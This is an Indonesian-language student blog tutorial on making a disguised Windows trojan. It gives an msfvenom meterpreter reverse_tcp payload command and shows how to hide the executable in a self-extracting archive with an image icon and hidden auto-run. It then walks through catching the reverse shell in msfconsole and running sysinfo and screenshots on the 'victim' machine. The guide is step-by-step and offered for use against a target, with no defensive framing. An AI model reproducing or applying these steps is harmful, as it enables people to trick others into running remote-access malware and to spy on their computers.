Tutorial Membuat Exploit Dengan MSFVenom
Anggota Kelompok :
1. Muhammad Sutan Nizar Pratama 1715015068
2. Erdinal Respatti 1715015048
3. ABD Rohim 1715015056
4. Abi Suhardino 1715015071
5. Wildan Mahfudz Zarkasi 1715015088
Ya balik lagi dengan tutorial dari kami, kali ini kami akan memberitahu cara membuat file exploit untuk me-remote prangkat lain.
1. Pilih gambar
Yang
pertama kita siapkan dulu gambar yang ingin kita timpa dengan file exploit
nantinya, seperti gambar di bawah kami menggunakan foto thanos dari film
“avenger infinity war”.
2. Ubah format foto
Setelah
dapat foto yang ingin digunakan, kita lanjut ke tahap selanjutnya yaitu membuat
salinan foto tersebut namun dengan format “ico”.
dan dikesempatan kali ini kami menggunakan aplikasi Format Factory yang dapat di unduh secara gratis. Pertama-tama kita
buka aplikasinya dan akan tampil tampilan seperti gambar di bawah. Lalu pilih
format ico lalu start. Dan hasilnya akan berada di folder foto originalnya
tadi.
3. Melihat IP
Sebelum
membuat file exploit, kita harus mengetahui ip kita terlebih dahulu yang akan digunakan untuk dalam pembuatan exploit tersebut, dengan cara membuka terminal
di kali linuxnya lalu mengetik perintah
“ifconfig” yang nantinya akan muncul tulisan seperti gambar di bawah.
Nah yang menunjukan ip kita adalah yang ada di dalam lingkaran merah tersebut, yang mana ip kami yakni 192.168.1.11
4. Membuat
file exploit
Sesudah
melihat ip kita tadi kita lanjut ke pembuatan file exploit dengan mengetik
msfvenom –p/meterpreter/reverse_tcp LHOST=(IP prangkat kita) LPORT =4444 –f exe > (Nama file yang ingin dibuat),
5. Pembuatan file zip
Sesudah kita membuat file explosit yang kita beri nama dengan
thanos.exe kita memerlukan gambar untuk menimpa file exe tersebut dengan file
ico yang sudah kita buat tadinya. Lalu di dalam pembuatan file tersebut di
gerneralnya kita ubah dulu compression metodnya menjadi best yang tadinya
normal lalu centang Create SFX archive
pada pilihan di sampingnya lalu klik tab advance di atasnya.
6. Pilih icon
Setelah
mengklik tab advanced maka ada tampilan seperti gambar dibawah, kita lanjutkan dengan mengklik SFX options lalu klik setup dan isi di run after extraction
nama file yang akan dijalankan nantinya setelah di exkstrak, jika sudah klik
ok.
7. Mengganti
Icon file
Setelah itu kita klik lagi
SFX options yang berada di tab Advanced lalu kita browse icon yang akan kita
gunakan nantinya
8. Hide all
Jika sudah
menambahkan icon kita lanjut ke modes yang ada di SFX options tadi, di dalamnya kita centang dulu Hide all lalu klik ok.
9. Hasil
Dan jadilah file exploit kita. Ya bernama thanos.sfx.exe, file ini
nantinya yang akan di jalankan di laptop target
10. Msfconsole
Setelah target membuka file exploit kita, kita lanjutkan dengan
membuka terminal lalu mengetik perintah msfconsole, maka akan muncul tampilan
seperti gambar di bawah.
11. Memasukan
Perintah di msfconsole
Di dalam msfconsole kita ketikan perintah use
exploit/multi/handler lalu get payload windows/meterpreter/reverse_tcp lalu
windows/meterpreter/reverse_tcp terus set local portnya dengan mengetik set
LHOST 192.168.1.11 dan jika muncul lagi kita ketikan show options dan akan
menampilkan data dari kali linux kita seperti gambar di bawah.
12. Exploit
Seteleah melakukan langkah yang diatas maka akan muncul daftar
target yang mana kita tinggal memasukkan query exploit untuk memulai exploit
pada prangkat target.
13. Info target
Setelah
memasukan perintah exploit, kita lanjutkan dengan melihat info system dan spesifikasi komputer target dengan mengetik sysinfo (System Info). Lalu coba melakukan
screenshot pada prangkat korban dengan cara mengetik “screenshot” pada
meterpreter di terminalnya.
14. Hasil
Screenshot 1
setelah itu
muncul lah hasil seperti di bawah ini.
15. Hasil
Screenshot 2
Dan ini lah
hasil dari screenshot exploit tadi.
Sekian tutorial dari kami, kurang lebihnya mohon maaf, sekian.
Comments
Post a Comment